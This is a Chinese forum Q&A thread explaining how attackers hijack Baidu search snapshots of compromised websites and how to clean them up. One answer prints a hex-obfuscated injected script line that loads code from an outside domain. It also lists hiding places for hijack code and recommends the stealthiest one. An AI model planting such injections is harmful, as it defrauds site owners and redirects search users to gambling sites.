|
支持 0
反对 0
举报
2022-03-16 03:59
快照劫持就是你在百度搜索关键词出现的结果排名的快照内容不是你网站的内容,而是一些不良信息,关于bocai类等的,那么就是你的网站中招了。那么他们是怎么做到的呢?这个肯定就是你网站程序有漏洞,让黑客技术人员找到后门进入你的网站进行篡改的,他们篡改的时间一般是晚上凌晨以后,这样在百度搜索引擎蜘蛛抓取你的快照的时候就是他们篡改的内容被抓取到了,然后又神不知鬼不觉的又把你原来的TDK换回来了。这样你就会发现你的网站什么都没有变化,但是你的快照内容发生了更改,这个时候你就是丈二的和尚了。
打开首页文件,找到文件顶部title标签的部分看看有无被加密的代码,然后清除掉,然后重新上传(如果全站被黑,那就只有彻底清除了),如果清理代码过后没过多久还是被反复篡改的话,应该对网站的源码以及文件进行检查,清除掉恶意链接。如果技术不够,无法准确判断的话,可以直接找专业的网站安全公司来处理解决,国内SINE安全、绿盟、启明星辰都是比较有名的安全公司 |
|
支持 0
反对 0
举报
2022-03-16 05:57
百度快照劫持就是黑客通过技术手段拿到你网站FTP权限或者数据库权限植入代码或添加劫持脚本,把他想要的内容写进一个页面代码里,在首页Head标签下调用,当搜索引擎访问你网站的时候抓取到你网站的标题-关键词-描述的时候,就会抓取到黑客设定的任何内容!当然这只是最简单的方法,SEO问问建议大家一定要注意网站安全。。。
前段时间有个客户电话说网站在百度的关键词排名没有了,查询下竟然百度标签显示的内容是一家彩票平台的网站内容。 我知道网站被黑客加入了非法代码,恶意篡改了百度快照。(截图如下) 百度快照是如何被黑客篡改的 经验心得 第2张 查看“百度快照”出现的是一组跳转网站的广告内容。我们对客户设置的网站信息消失了。 百度快照是如何被黑客篡改的 经验心得 第3张 第二部:下面讲解下黑客常用的百度快照劫持方法 1、放在Head下进行劫持快照 直接将代码放到首页的Head标签下,当搜索引擎抓取网站快照的时候直接调用该页面的内容,即可进行劫持,非常的简单。(SEO问问觉得该方法很容易识别直接在网站首页代码你找到可疑调用页面,即可清除劫持的内容。) 2、发现伪装JS文件,疑似JS手段实现 例如直接查看的源代码,没有发现任何问题,通过FF的插件可以看到,页面通过SCRIPT脚步方式载入了一个“”的文件,通过万网的WHOIS居然提示不能查询TK域名,难得的是也依然没有结果,站长工具的WHOIS查询倒是出了结果,可没有任何意义。 本地ping,发现域名指向的是,难道问题不在这里? 在服务器中js/文件中找到了两句问题代码 1 2 var _$=["\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x77\x7a\x62\x33\x36\x30\x2e\x74\x6b\/\x69\x6d\x61\x67\x65\x2e\x67\x69\x66\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"]; (_$[0]); 1 ("<\/script>"); 第二句就是之前发现的问题代码,但是访问不了。 第一句加密了,解密之后朽木发现和第二句是同样的代码。 怀疑是服务器做了特殊处理,只有在载入JS形式时才可以访问。 百度快照蛛丝马迹,黑客偷梁换柱 从快照中看出百度索引到的页面并不是我们访问时候看到的页面,页面结构是纯CSS组成,并且没有调用外部文件,顶部有一个“保定市人民政府 ”的链接指向了,那么毋庸置疑,能实现这种效果的只有两种方法: 第一种,在凌晨时间段把假的主页换上去,对于这样的高权重站,百度在晚上是绝对不会休息的,那么每天的0点到3点换上假的主页,不出3天肯定能索引到这个“主页”。 3、放到已有的Include文件里面进行劫持快照 Include是包括的意思,也就是说Include是首页文件引用的另一个文件,我们把代码加到这个Include文件中,同样能实现劫持效果,而此时劫持代码并不在首页,而是放到了Include文件中。 在选择上,这三种方法中,第一种是最直接和方便的,直接加到主页文件里面就行。第二种和第三种相对隐蔽些,第二种只需在已有的Include文件中加上劫持代码即可,也非常的方便,并且隐蔽。第三种方法同样很隐蔽,但多了两个步骤,一个是需要创建一个Include文件,还有就是要添加一行引用Include文件的代码。综合下来,推荐使用第二种方法,第二种方法比第一种隐蔽,比第三种方便。 SEO问问在线总结:黑客通过快照劫持代码能实现百度快照劫持,是黑帽SEO比较早的技术,通过劫持webshell网站,实现自己的网站排名,主要功能是改变webshell网站的快照,使其快照显示为你设置的快照,这个时候对方的网站快照(包括标题,关键字,描述都变成你的)。代码通过实现快照变成你的,当然排名也变成你的,通过内置的跳转代码,每次通过搜索引擎点进去,网站就会跳转到其他网站。这就是百度快照劫持的原理,以及更高级的301权重劫持手法! SEO问问觉得一个网站要想做得长久一定要注意网站安全,你是否还觉得网站安全不重要,不知道大家看完这篇文章是否在行动起来! 原创作者:SEO问问 想了解更多可以点击以下地址: |
已解决
